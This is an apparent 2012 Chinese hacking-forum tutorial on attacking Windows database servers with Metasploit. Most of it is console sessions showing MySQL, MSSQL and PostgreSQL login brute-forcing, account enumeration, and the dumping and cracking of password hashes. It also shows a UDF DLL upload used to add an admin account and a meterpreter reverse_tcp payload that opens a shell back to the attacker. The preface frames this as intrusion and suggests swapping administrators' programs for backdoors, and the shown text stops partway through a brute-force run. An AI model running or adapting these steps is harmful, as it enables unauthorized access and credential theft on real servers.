切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
14 Metasploit 权限提升[复制链接]
发表于 2012-8-6 10:39:45 | 显示全部楼层 |!read_mode!

其实这篇小说的名字改为WINDOWS环境的数据库攻击更好。。。。。。

前言

  现在的入侵是越来越难了,人们的安全意识都普遍提高了不少,连个人用户都懂得防火墙,杀毒软件要装备在手,对于微软的补丁升级也不再是不加问津。因此现在我们想在因特网上扫描弱口令的主机已经几乎是痴心妄想了。(这可是一件大大的好事啊。)

  但是这也使得我们作黑客的进行入侵检测达到了一个前所未有的难度。通过各种手段,我们通常并不能直接获得一个系统的管理员权限。比如我们通过某些对IIS的攻击,只能获得IUSR-MACHINENAME的权限(如上传asp木马,以及某些溢出等)。这个帐号通常可是系统默认的guest权限,于是,如何拿到系统管理员或者是system权限,便显得日益重要了。

  于是,我就总结了一下大家所经常使用的几种提升权限的方法,以下内容是我整理的,没有什么新的方法,写给和我一样的菜鸟看的。高手们就可以略去了,当然,你要复习我不反对,顺便帮我查查有什么补充
恩,主要是针对数据库的。
如果对方没有你所能利用的服务,也可以替换对方管理员常用的程序,例如QQ,MSN等等,具体替换方法与替换服务一样,只是你的后门什么时候可以启动就得看你的运气了。
还有外部设备没说。。。。
还有改启动项木没说
好多好多懒得写了。。

Mysql数据库

首先得开启外联 WIndows

  1. GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'you password' WITH GRANT OPTION;
复制代码
进行攻击扫描一个主机
  1. msf > use auxiliary/scanner/mysql/mysql_login
  2. msf  auxiliary(mysql_login) > set RHOSTS 5.5.5.3
  3. RHOSTS => 5.5.5.3
  4. msf  auxiliary(mysql_login) > set USERNAME root
  5. USERNAME => root
  6. msf  auxiliary(mysql_login) > set PASS_FILE /pen/msf3/data/wordlists/postgres_default_pass.txt
  7. PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt
  8. msf  auxiliary(mysql_login) > exploit
  9. [*] 5.5.5.3:3306 MYSQL - Found remote MySQL version 5.5.16
  10. [*] 5.5.5.3:3306 MYSQL - [1/7] - Trying username:'root' with password:''
  11. [*] 5.5.5.3:3306 MYSQL - [1/7] - failed to login as 'root' with password ''
  12. [*] 5.5.5.3:3306 MYSQL - [2/7] - Trying username:'root' with password:'root'
  13. [*] 5.5.5.3:3306 MYSQL - [2/7] - failed to login as 'root' with password 'root'
  14. [*] 5.5.5.3:3306 MYSQL - [3/7] - Trying username:'root' with password:'tiger'
  15. [*] 5.5.5.3:3306 MYSQL - [3/7] - failed to login as 'root' with password 'tiger'
  16. [*] 5.5.5.3:3306 MYSQL - [4/7] - Trying username:'root' with password:'postgres'
  17. [*] 5.5.5.3:3306 MYSQL - [4/7] - failed to login as 'root' with password 'postgres'
  18. [*] 5.5.5.3:3306 MYSQL - [5/7] - Trying username:'root' with password:'password'
  19. [*] 5.5.5.3:3306 MYSQL - [5/7] - failed to login as 'root' with password 'password'
  20. [*] 5.5.5.3:3306 MYSQL - [6/7] - Trying username:'root' with password:'admin'
  21. [*] 5.5.5.3:3306 MYSQL - [6/7] - failed to login as 'root' with password 'admin'
  22. [*] 5.5.5.3:3306 MYSQL - [7/7] - Trying username:'root' with password:'123456'
  23. [+] 5.5.5.3:3306 - SUCCESSFUL LOGIN 'root' : '123456'
  24. [*] Scanned 1 of 1 hosts (100% complete)
  25. [*] Auxiliary module execution completed
复制代码
查看结果:
  1. msf  auxiliary(mysql_login) > creds

  2. Credentials
  3. ===========

  4. host     port  user  pass    type      active?
  5. ----     ----  ----  ----    ----      -------
  6. 5.5.5.3  3306  root  123456  password  true

  7. [*] Found 1 credential.
  8. msf  auxiliary(mysql_login) >
复制代码
查看信息
  1. msf  exploit(ms10_018_ie_behaviors) > use auxiliary/admin/mysql/mysql_enum
  2. msf  auxiliary(mysql_enum) > show options

  3. Module options (auxiliary/admin/mysql/mysql_enum):

  4.    Name      Current Setting  Required  Description
  5.    ----      ---------------  --------  -----------
  6.    PASSWORD                   no        The password for the specified username
  7.    RHOST                      yes       The target address
  8.    RPORT     3306             yes       The target port
  9.    USERNAME                   no        The username to authenticate as

  10. msf  auxiliary(mysql_enum) > set PASSWORD 123456
  11. PASSWORD => 123456
  12. msf  auxiliary(mysql_enum) > set USERNAME root
  13. USERNAME => root
  14. msf  auxiliary(mysql_enum) > set RHOST 5.5.5.3
  15. RHOST => 5.5.5.3
  16. msf  auxiliary(mysql_enum) > exploit

  17. [*] Running MySQL Enumerator...
  18. [*] Enumerating Parameters
  19. [*]         MySQL Version: 5.5.16
  20. [*]         Compiled for the following OS: Win32
  21. [*]         Architecture: x86
  22. [*]         Server Hostname: dis9team-a1
  23. [*]         Data Directory: C:\xampp\mysql\data\
  24. [*]         Logging of queries and logins: OFF
  25. [*]         Old Password Hashing Algorithm OFF
  26. [*]         Loading of local files: ON
  27. [*]         Logins with old Pre-4.1 Passwords: OFF
  28. [*]         Allow Use of symlinks for Database Files: YES
  29. [*]         Allow Table Merge:
  30. [*]         SSL Connection: DISABLED
  31. [*] Enumerating Accounts:
  32. [*]         List of Accounts with Password Hashes:
  33. [*]                 User: root Host: localhost Password Hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
  34. [*]                 User: root Host: 127.0.0.1 Password Hash:
  35. [*]                 User:  Host: localhost Password Hash:
  36. [*]                 User: pma Host: localhost Password Hash:
  37. [*]                 User: root Host: % Password Hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
  38. [*]         The following users have GRANT Privilege:
  39. [*]                 User: root Host: localhost
  40. [*]                 User: root Host: 127.0.0.1
  41. [*]                 User: root Host: %
  42. [*]         The following users have CREATE USER Privilege:
  43. [*]                 User: root Host: localhost
  44. [*]                 User: root Host: 127.0.0.1
  45. [*]                 User: root Host: %
  46. [*]         The following users have RELOAD Privilege:
  47. [*]                 User: root Host: localhost
  48. [*]                 User: root Host: 127.0.0.1
  49. [*]                 User: root Host: %
  50. [*]         The following users have SHUTDOWN Privilege:
  51. [*]                 User: root Host: localhost
  52. [*]                 User: root Host: 127.0.0.1
  53. [*]                 User: root Host: %
  54. [*]         The following users have SUPER Privilege:
  55. [*]                 User: root Host: localhost
  56. [*]                 User: root Host: 127.0.0.1
  57. [*]                 User: root Host: %
  58. [*]         The following users have FILE Privilege:
  59. [*]                 User: root Host: localhost
  60. [*]                 User: root Host: 127.0.0.1
  61. [*]                 User: root Host: %
  62. [*]         The following users have PROCESS Privilege:
  63. [*]                 User: root Host: localhost
  64. [*]                 User: root Host: 127.0.0.1
  65. [*]                 User: root Host: %
  66. [*]         The following accounts have privileges to the mysql database:
  67. [*]                 User: root Host: localhost
  68. [*]                 User: root Host: 127.0.0.1
  69. [*]                 User: root Host: %
  70. [*]         Anonymous Accounts are Present:
  71. [*]                 User:  Host: localhost
  72. [*]         The following accounts have empty passwords:
  73. [*]                 User: root Host: 127.0.0.1
  74. [*]                 User:  Host: localhost
  75. [*]                 User: pma Host: localhost
  76. [*]         The following accounts are not restricted by source:
  77. [*]                 User: root Host: %
  78. [*] Auxiliary module execution completed
  79. msf  auxiliary(mysql_enum) >
复制代码
执行语句
  1. msf  auxiliary(mysql_enum) > use auxiliary/admin/mysql/mysql_sql
  2. msf  auxiliary(mysql_sql) > show options

  3. Module options (auxiliary/admin/mysql/mysql_sql):

  4.    Name      Current Setting   Required  Description
  5.    ----      ---------------   --------  -----------
  6.    PASSWORD                    no        The password for the specified username
  7.    RHOST                       yes       The target address
  8.    RPORT     3306              yes       The target port
  9.    SQL       select version()  yes       The SQL to execute.
  10.    USERNAME                    no        The username to authenticate as

  11. msf  auxiliary(mysql_sql) > set PASSWORD 123456
  12. PASSWORD => 123456
  13. msf  auxiliary(mysql_sql) > set RHOST 5.5.5.3
  14. RHOST => 5.5.5.3
  15. msf  auxiliary(mysql_sql) > set USERNAME root
  16. USERNAME => root
  17. msf  auxiliary(mysql_sql) > exploit

  18. [*] Sending statement: 'select version()'...
  19. [*]  | 5.5.16 |
  20. [*] Auxiliary module execution completed
  21. msf  auxiliary(mysql_sql) >
复制代码
导出HASH
  1. msf  auxiliary(mysql_sql) > use auxiliary/scanner/mysql/mysql_hashdump
  2. msf  auxiliary(mysql_hashdump) > show options

  3. Module options (auxiliary/scanner/mysql/mysql_hashdump):

  4.    Name      Current Setting  Required  Description
  5.    ----      ---------------  --------  -----------
  6.    PASSWORD                   no        The password for the specified username
  7.    RHOSTS                     yes       The target address range or CIDR identifier
  8.    RPORT     3306             yes       The target port
  9.    THREADS   1                yes       The number of concurrent threads
  10.    USERNAME                   no        The username to authenticate as

  11. msf  auxiliary(mysql_hashdump) > set PASSWORD 123456
  12. PASSWORD => 123456
  13. smsf  auxiliary(mysql_hashdump) > set USERNAME root
  14. USERNAME => root
  15. msf  auxiliary(mysql_hashdump) > set RHOSTS 5.5.5.3
  16. RHOSTS => 5.5.5.3
  17. msf  auxiliary(mysql_hashdump) > exploit

  18. [+] Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
  19. [+] Saving HashString as Loot: root:
  20. [+] Saving HashString as Loot: :
  21. [+] Saving HashString as Loot: pma:
  22. [+] Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
  23. [+] Saving HashString as Loot: dis9team:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
  24. [*] Hash Table has been saved: /home/brk/.msf4/loot/20120312075809_default_5.5.5.3_mysql.hashes_864135.txt
  25. [*] Scanned 1 of 1 hosts (100% complete)
  26. [*] Auxiliary module execution completed
  27. msf  auxiliary(mysql_hashdump) >
复制代码
破解HASH先看数据库的信息 木有木办法破解 必须先导出 工具是编译好的JOHN
  1. msf  auxiliary(mysql_hashdump) > loot

  2. Loot
  3. ====

  4. host     service  type          name                          content     info          path
  5. ----     -------  ----          ----                          -------     ----          ----
  6. 5.5.5.3  mysql    mysql.hashes  5.5.5.3-3306_mysqlhashes.txt  text/plain  MySQL Hashes  /home/brk/.msf4/loot/20120312075903_default_5.5.5.3_mysql.hashes_213052.txt

  7. msf  auxiliary(mysql_hashdump) >
复制代码
有了 直接破解
  1. msf  auxiliary(mysql_hashdump) > use auxiliary/analyze/jtr_mysql_fast
  2. msf  auxiliary(jtr_mysql_fast) > exploit

  3. [*] HashList: /tmp/jtrtmp20120312-29370-1ra46p8
  4. [*] Trying 'mysql-fast' Wordlist: /tmp/jtrtmp20120312-29370-ojc089
  5. [*] Output: No password hashes loaded (see FAQ)
  6. [*] Trying 'mysql-fast' Rule: All4...
  7. [*] Output: No password hashes loaded (see FAQ)
  8. [*] Trying mysql-fast Rule: Digits5...
  9. [*] Output: No password hashes loaded (see FAQ)
  10. [*] 0 password hashes cracked, 0 left

  11. [*] 0 hashes were cracked!
  12. [*] Trying 'mysql-sha1' Wordlist: /tmp/jtrtmp20120312-29370-ojc089
  13. guesses: 1  time: 0:00:00:00 DONE (Mon Mar 12 07:59:31 2012)  c/s: 480  trying: 123321 - 123456
  14. Warning: passwords printed above might not be all those cracked
  15. Use the "--show" option to display all of the cracked passwords reliably
  16. [*] Output: Loaded 1 password hash (MySQL 4.1 double-SHA-1 [mysql-sha1 SSE2])
  17. [*] Output: 123456           (root)
  18. [*] Trying 'mysql-sha1' Rule: All4...
  19. [*] Output: Loaded 1 password hash (MySQL 4.1 double-SHA-1 [mysql-sha1 SSE2])
  20. [*] Output: No password hashes left to crack (see FAQ)
  21. [*] Trying 'mysql-sha1' Rule: Digits5...
  22. [*] Output: Loaded 1 password hash (MySQL 4.1 double-SHA-1 [mysql-sha1 SSE2])
  23. [*] Output: No password hashes left to crack (see FAQ)
  24. [*] root:123456:5.5.5.3:3306

  25. [*] root:123456:5.5.5.3:3306

  26. [*] dis9team:123456:5.5.5.3:3306

  27. [*]

  28. [*] 3 password hashes cracked, 0 left

  29. [*] 3 hashes were cracked!
  30. [+] Host: 5.5.5.3 Port: 3306 User: root Pass: 123456
  31. [+] Host: 5.5.5.3 Port: 3306 User: dis9team Pass: 123456
  32. [*] Auxiliary module execution completed
  33. msf  auxiliary(jtr_mysql_fast) >
复制代码
数据库明文记录
  1. msf  auxiliary(jtr_mysql_fast) > creds

  2. Credentials
  3. ===========

  4. host     port  user      pass    type      active?
  5. ----     ----  ----      ----    ----      -------
  6. 5.5.5.3  3306  root      123456  password  true
  7. 5.5.5.3  3306  dis9team  123456  password  true

  8. [*] Found 2 credentials.
  9. msf  auxiliary(jtr_mysql_fast) >
复制代码
权限提升
  1. msf  auxiliary(mysql_login) > use exploit/windows/mysql/mysql_payload
  2. msf  exploit(mysql_payload) > set RHOST 5.5.5.3
  3. RHOST => 5.5.5.3
  4. msf  exploit(mysql_payload) > show options

  5. Module options (exploit/windows/mysql/mysql_payload):

  6.    Name              Current Setting  Required  Description
  7.    ----              ---------------  --------  -----------
  8.    FORCE_UDF_UPLOAD  false            no        Always attempt to install a sys_exec() mysql.function.
  9.    PASSWORD                           no        The password for the specified username
  10.    RHOST             5.5.5.3          yes       The target address
  11.    RPORT             3306             yes       The target port
  12.    USERNAME          root             no        The username to authenticate as

  13. Payload options (windows/meterpreter/reverse_tcp):

  14.    Name      Current Setting  Required  Description
  15.    ----      ---------------  --------  -----------
  16.    EXITFUNC  process          yes       Exit technique: seh, thread, process, none
  17.    LHOST     5.5.5.1          yes       The listen address
  18.    LPORT     4444             yes       The listen port

  19. Exploit target:

  20.    Id  Name
  21.    --  ----
  22.    0   Automatic

  23. msf  exploit(mysql_payload) > set PASSWORD 123456
  24. PASSWORD => 123456
  25. msf  exploit(mysql_payload) > exploit
  26. [*] Started reverse handler on 5.5.5.1:4444
  27. [*] Checking target architecture...
  28. [*] Checking for sys_exec()...
  29. [*] Checking target architecture...
  30. [*] Checking for MySQL plugin directory...
  31. [*] Target arch (win32) and target path both okay.
  32. [*] Uploading lib_mysqludf_sys_32.dll library to C:/xampp/mysql/lib/plugin/CHlQoqQu.dll...
  33. [*] Checking for sys_exec()...
  34. [*] Command Stager progress -   1.47% done (1499/102246 bytes)
  35. [*] Command Stager progress -   2.93% done (2998/102246 bytes)
  36. [*] Command Stager progress -   4.40% done (4497/102246 bytes)
  37. [*] Command Stager progress -   5.86% done (5996/102246 bytes)
  38. [*] Command Stager progress -   7.33% done (7495/102246 bytes)
  39. [*] Command Stager progress -   8.80% done (8994/102246 bytes)
  40. [*] Command Stager progress -  10.26% done (10493/102246 bytes)
  41. [*] Command Stager progress -  11.73% done (11992/102246 bytes)
  42. [*] Command Stager progress -  13.19% done (13491/102246 bytes)
  43. [*] Command Stager progress -  14.66% done (14990/102246 bytes)
  44. [*] Command Stager progress -  16.13% done (16489/102246 bytes)
  45. [*] Command Stager progress -  17.59% done (17988/102246 bytes)
  46. [*] Command Stager progress -  19.06% done (19487/102246 bytes)
  47. [*] Command Stager progress -  20.53% done (20986/102246 bytes)
  48. [*] Command Stager progress -  21.99% done (22485/102246 bytes)
  49. [*] Command Stager progress -  23.46% done (23984/102246 bytes)
  50. [*] Command Stager progress -  24.92% done (25483/102246 bytes)
  51. [*] Command Stager progress -  26.39% done (26982/102246 bytes)
  52. [*] Command Stager progress -  27.86% done (28481/102246 bytes)
  53. [*] Command Stager progress -  29.32% done (29980/102246 bytes)
  54. [*] Command Stager progress -  30.79% done (31479/102246 bytes)
  55. [*] Command Stager progress -  32.25% done (32978/102246 bytes)
  56. [*] Command Stager progress -  33.72% done (34477/102246 bytes)
  57. [*] Command Stager progress -  35.19% done (35976/102246 bytes)
  58. [*] Command Stager progress -  36.65% done (37475/102246 bytes)
  59. [*] Command Stager progress -  38.12% done (38974/102246 bytes)
  60. [*] Command Stager progress -  39.58% done (40473/102246 bytes)
  61. [*] Command Stager progress -  41.05% done (41972/102246 bytes)
  62. [*] Command Stager progress -  42.52% done (43471/102246 bytes)
  63. [*] Command Stager progress -  43.98% done (44970/102246 bytes)
  64. [*] Command Stager progress -  45.45% done (46469/102246 bytes)
  65. [*] Command Stager progress -  46.91% done (47968/102246 bytes)
  66. [*] Command Stager progress -  48.38% done (49467/102246 bytes)
  67. [*] Command Stager progress -  49.85% done (50966/102246 bytes)
  68. [*] Command Stager progress -  51.31% done (52465/102246 bytes)
  69. [*] Command Stager progress -  52.78% done (53964/102246 bytes)
  70. [*] Command Stager progress -  54.24% done (55463/102246 bytes)
  71. [*] Command Stager progress -  55.71% done (56962/102246 bytes)
  72. [*] Command Stager progress -  57.18% done (58461/102246 bytes)
  73. [*] Command Stager progress -  58.64% done (59960/102246 bytes)
  74. [*] Command Stager progress -  60.11% done (61459/102246 bytes)
  75. [*] Command Stager progress -  61.58% done (62958/102246 bytes)
  76. [*] Command Stager progress -  63.04% done (64457/102246 bytes)
  77. [*] Command Stager progress -  64.51% done (65956/102246 bytes)
  78. [*] Command Stager progress -  65.97% done (67455/102246 bytes)
  79. [*] Command Stager progress -  67.44% done (68954/102246 bytes)
  80. [*] Command Stager progress -  68.91% done (70453/102246 bytes)
  81. [*] Command Stager progress -  70.37% done (71952/102246 bytes)
  82. [*] Command Stager progress -  71.84% done (73451/102246 bytes)
  83. [*] Command Stager progress -  73.30% done (74950/102246 bytes)
  84. [*] Command Stager progress -  74.77% done (76449/102246 bytes)
  85. [*] Command Stager progress -  76.24% done (77948/102246 bytes)
  86. [*] Command Stager progress -  77.70% done (79447/102246 bytes)
  87. [*] Command Stager progress -  79.17% done (80946/102246 bytes)
  88. [*] Command Stager progress -  80.63% done (82445/102246 bytes)
  89. [*] Command Stager progress -  82.10% done (83944/102246 bytes)
  90. [*] Command Stager progress -  83.57% done (85443/102246 bytes)
  91. [*] Command Stager progress -  85.03% done (86942/102246 bytes)
  92. [*] Command Stager progress -  86.50% done (88441/102246 bytes)
  93. [*] Command Stager progress -  87.96% done (89940/102246 bytes)
  94. [*] Command Stager progress -  89.43% done (91439/102246 bytes)
  95. [*] Command Stager progress -  90.90% done (92938/102246 bytes)
  96. [*] Command Stager progress -  92.36% done (94437/102246 bytes)
  97. [*] Command Stager progress -  93.83% done (95936/102246 bytes)
  98. [*] Command Stager progress -  95.29% done (97435/102246 bytes)
  99. [*] Command Stager progress -  96.76% done (98934/102246 bytes)
  100. [*] Command Stager progress -  98.19% done (100400/102246 bytes)
  101. [*] Command Stager progress -  99.59% done (101827/102246 bytes)
  102. [*] Command Stager progress - 100.00% done (102246/102246 bytes)
  103. msf  exploit(mysql_payload) > sessions

  104. Active sessions
  105. ===============

  106. No active sessions.

  107. msf  exploit(mysql_payload) >
复制代码
恩?
为什么没反映
了? 其实已经成功鸟=.= 远程链接数据库执行 :
  1. SELECT sys_exec('net user admin /add');
复制代码
其实用户已经添加上去了
MSsql数据库查看破解模块信息
  1. msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
  2. msf auxiliary(mssql_login) > info

  3.        Name: MSSQL Login Utility
  4.     Version: 7185
  5.     License: Metasploit Framework License (BSD)

  6. Provided by:
  7.   MC

  8. Basic options:
  9.   Name             Current Setting                                        Required  Description
  10.   ----             ---------------                                        --------  -----------
  11.   HEX2BINARY       /home/carlos/framework3/trunk/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
  12.   MSSQL_PASS                                                              no        The password for the specified username
  13.   MSSQL_PASS_FILE                                                         no        A dictionary of passwords to perform a bruteforce attempt
  14.   MSSQL_USER       sa                                                     no        The username to authenticate as
  15.   RHOSTS                                                                  yes       The target address range or CIDR identifier
  16.   RPORT            1433                                                   yes       The target port
  17.   THREADS          1                                                      yes       The number of concurrent threads

  18. Description:
  19.   This module simply queries the MSSQL instance for a specific
  20.   user/pass (default is sa with blank).
复制代码
设置密码字典破解
  1. msf auxiliary(mssql_login) > set MSSQL_USER meta
  2. MSSQL_USER => meta
  3. msf auxiliary(mssql_login) > set MSSQL_PASS_FILE /tmp/dict.txt
  4. MSSQL_PASS_FILE => /tmp/dict.txt
  5. msf auxiliary(mssql_login) > set RHOSTS 192.168.1.156
  6. RHOSTS => 192.168.1.156
  7. msf auxiliary(mssql_login) > run

  8. [*] 192.168.1.156:1433 successful logged in as 'meta' with password 'meta'
  9. [*] Scanned 1 of 1 hosts (100% complete)
  10. [*] Auxiliary module execution completed
  11. msf auxiliary(mssql_login) >
复制代码
查看MSSQL函数

  1. msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_enum
  2. msf auxiliary(mssql_enum) > set MSSQL_USER meta
  3. MSSQL_USER => meta
  4. msf auxiliary(mssql_enum) > set MSSQL_PASS meta
  5. MSSQL_USER => meta
  6. msf auxiliary(mssql_enum) > set RHOST 192.168.1.156
  7. RHOST => 192.168.1.156
  8. msf auxiliary(mssql_enum) > run

  9. [*] Running MS SQL Server Enumeration...
  10. [*] Auxiliary module execution completed
  11. msf auxiliary(mssql_enum) > set MSSQL_PASS meta
  12. MSSQL_PASS => meta
  13. msf auxiliary(mssql_enum) > run

  14. [*] Running MS SQL Server Enumeration...
  15. [*] Version:
  16. [*]     Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86)
  17. [*]             Jul  9 2008 14:43:34
  18. [*]             Copyright (c) 1988-2008 Microsoft Corporation
  19. [*]             Enterprise Edition on Windows NT 5.2  (Build 3790: Service Pack 2)
  20. [*] Configuration Parameters:
  21. [*]     C2 Audit Mode is Not Enabled
  22. [*]     xp_cmdshell is Enabled
  23. [*]     remote access is Enabled
  24. [*]     allow updates is Not Enabled
  25. [*]     Database Mail XPs is Not Enabled
  26. [*]     Ole Automation Procedures are Not Enabled
  27. [*] Databases on the server:
  28. [*]     Database name:master
  29. [*]     Databse Files for master:
  30. [*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\master.mdf
  31. [*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\mastlog.ldf
  32. [*]     Database name:tempdb
  33. [*]     Databse Files for tempdb:
  34. [*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\tempdb.mdf
  35. [*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\templog.ldf
  36. [*]     Database name:model
  37. [*]     Databse Files for model:
  38. [*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\model.mdf
  39. [*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\modellog.ldf
  40. [*]     Database name:msdb
  41. [*]     Databse Files for msdb:
  42. [*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf
  43. [*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\MSDBLog.ldf
  44. [*] System Logins on this Server:
  45. [*]     sa
  46. [*]     ##MS_SQLResourceSigningCertificate##
  47. [*]     ##MS_SQLReplicationSigningCertificate##
  48. [*]     ##MS_SQLAuthenticatorCertificate##
  49. [*]     ##MS_PolicySigningCertificate##
  50. [*]     ##MS_PolicyEventProcessingLogin##
  51. [*]     ##MS_PolicyTsqlExecutionLogin##
  52. [*]     ##MS_AgentSigningCertificate##
  53. [*]     NT AUTHORITY\SYSTEM
  54. [*]     NT AUTHORITY\NETWORK SERVICE
  55. [*]     DBSQL2K801\Administrator
  56. [*]     dangerlogin
  57. [*]     meta
  58. [*] Disabled Accounts:
  59. [*]     sa
  60. [*]     ##MS_PolicyEventProcessingLogin##
  61. [*]     ##MS_PolicyTsqlExecutionLogin##
  62. [*] No Accounts Policy is set for:
  63. [*]     dangerlogin
  64. [*]     meta
  65. [*] Password Expiration is not checked for:
  66. [*]     sa
  67. [*]     ##MS_PolicyEventProcessingLogin##
  68. [*]     ##MS_PolicyTsqlExecutionLogin##
  69. [*]     dangerlogin
  70. [*]     meta
  71. [*] System Admin Logins on this Server:
  72. [*]     sa
  73. [*]     NT AUTHORITY\SYSTEM
  74. [*]     NT AUTHORITY\NETWORK SERVICE
  75. [*]     DBSQL2K801\Administrator
  76. [*]     meta
  77. [*] Windows Logins on this Server:
  78. [*]     NT AUTHORITY\SYSTEM
  79. [*]     NT AUTHORITY\NETWORK SERVICE
  80. [*]     DBSQL2K801\Administrator
  81. [*] Windows Groups that can logins on this Server:
  82. [*]     No Windows Groups where found with permission to login to system.
  83. [*] Accounts with Username and Password being the same:
  84. [*]     meta
  85. [*] Accounts with empty password:
  86. [*]     No Accounts with empty passwords where found.
  87. [*] Stored Procedures with Public Execute Permission found:
  88. [*]     sp_replsetsyncstatus
  89. [*]     sp_replcounters
  90. [*]     sp_replsendtoqueue
  91. [*]     sp_resyncexecutesql
  92. [*]     sp_prepexecrpc
  93. [*]     sp_repltrans
  94. [*]     sp_xml_preparedocument
  95. [*]     xp_qv
  96. [*]     xp_getnetname
  97. [*]     sp_releaseschemalock
  98. [*]     sp_refreshview
  99. [*]     sp_replcmds
  100. [*]     sp_unprepare
  101. [*]     sp_resyncprepare
  102. [*]     sp_createorphan
  103. [*]     xp_dirtree
  104. [*]     sp_replwritetovarbin
  105. [*]     sp_replsetoriginator
  106. [*]     sp_xml_removedocument
  107. [*]     sp_repldone
  108. [*]     sp_reset_connection
  109. [*]     xp_fileexist
  110. [*]     xp_fixeddrives
  111. [*]     sp_getschemalock
  112. [*]     sp_prepexec
  113. [*]     xp_revokelogin
  114. [*]     sp_resyncuniquetable
  115. [*]     sp_replflush
  116. [*]     sp_resyncexecute
  117. [*]     xp_grantlogin
  118. [*]     sp_droporphans
  119. [*]     xp_regread
  120. [*]     sp_getbindtoken
  121. [*]     sp_replincrementlsn
  122. [*] Instances found on this server:
  123. [*]     MSSQLSERVER
  124. [*]     TESTINST
  125. [*] Default Server Instance SQL Server Service is running under the privilege of:
  126. [*]     NT AUTHORITY\NETWORK SERVICE
  127. [*] Instance TESTINST SQL Server Service is running under the privilage of:
  128. [*]     LocalSystem
  129. [*] Auxiliary module execution completed
  130. msf auxiliary(mssql_enum) >
复制代码
取得权限
  1. msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
  2. PAYLOAD => windows/meterpreter/reverse_tcp
  3. msf exploit(mssql_payload) > set LHOST 192.168.1.158
  4. LHOST => 192.168.1.158
  5. msf exploit(mssql_payload) > set RHOST 92.168.1.156
  6. RHOST => 92.168.1.156
  7. msf exploit(mssql_payload) > set MSSQL_USER meta
  8. MSSQL_USER => meta
  9. msf exploit(mssql_payload) > set MSSQL_PASS meta
  10. MSSQL_PASS => meta
  11. msf exploit(mssql_payload) > exploit
  12. msf exploit(mssql_payload) > exploit

  13. [*] Started reverse handler on port 4444
  14. [*] Warning: This module will leave fGDpiveA.exe in the SQL Server %TEMP% directory
  15. [*] Writing the debug.com loader to the disk...
  16. [*] Converting the debug script to an executable...
  17. [*] Uploading the payload, please be patient...
  18. [*] Converting the encoded payload...
  19. [*] Executing the payload...
  20. [*] Sending stage (719360 bytes)
  21. [*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.156:1708)

  22. meterpreter > sysinfo
复制代码
postgresql暴力破解一个主机

  1. msf > use auxiliary/scanner/postgres/postgres_login
  2. msf  auxiliary(postgres_login) >
复制代码
  1. 字典等等已经设置好了 你可以默认也可以子机改
  2. 我直接运行了 我的密码都是 123456 =.=
复制代码
  1. msf  auxiliary(postgres_login) > exploit

  2. [*] 5.5.5.3:5432 Postgres - [01/14] - Trying username:'postgres' with password:'' on database 'template1'
  3. [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'postgres':''
  4. [-] 5.5.5.3:5432 Postgres - [01/14] - Username/Password failed.
  5. [*] 5.5.5.3:5432 Postgres - [02/14] - Trying username:'' with password:'' on database 'template1'
  6. [-] 5.5.5.3:5432 Postgres - Invalid username or password: '':''
  7. [-] 5.5.5.3:5432 Postgres - [02/14] - Username/Password failed.
  8. [*] 5.5.5.3:5432 Postgres - [03/14] - Trying username:'scott' with password:'' on database 'template1'
  9. [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'scott':''
  10. [-] 5.5.5.3:5432 Postgres - [03/14] - Username/Password failed.
  11. [*] 5.5.5.3:5432 Postgres - [04/14] - Trying username:'admin' with password:'' on database 'template1'
  12. [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'admin':''
  13. [-] 5.5.5.3:5432 Postgres - [04/14] - Username/Password failed.
  14. [*] 5.5.5.3:5432 Postgres - [05/14] - Trying username:'postgres' with password:'postgres' on database 'template1'
  15. [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'postgres':'postgres'
  16. [-] 5.5.5.3:5432 Postgres - [05/14] - Username/Password failed.
  17. [*] 5.5.5.3:5432 Postgres - [06/14] - Trying username:'scott' with password:'scott' on database 'template1'
  18. [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'scott':'scott'
  19. [-] 5.5.5.3:5432 Postgres - [06/14] - Username/Password failed.
  20. [*] 5.5.5.3:5432 Postgres - [07/14] - Trying username:'admin' with password:'admin' on database 'template1'
  21. [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'admin':'admin'
  22. [-] 5.5.5.3:5432 Postgres - [07/14] - Username/Password failed.
  23. [*] 5.5.5.3:5432 Postgres - [08/14] - Trying username:'postgres' with password:'password' on database 'template1'
  24. [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'postgres':'password'
  25. [-] 5.5.5.3:5432 Postgres - [08/14] - Username/Password failed.
  26. [*] 5.5.5.3:5432 Postgres - [09/14] - Trying username:'postgres' with password:'admin' on database 'template1'
  27. [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'postgres':'admin'
  28. [-] 5.5.5.3:5432 Postgres - [09/14] - Username/Password failed.
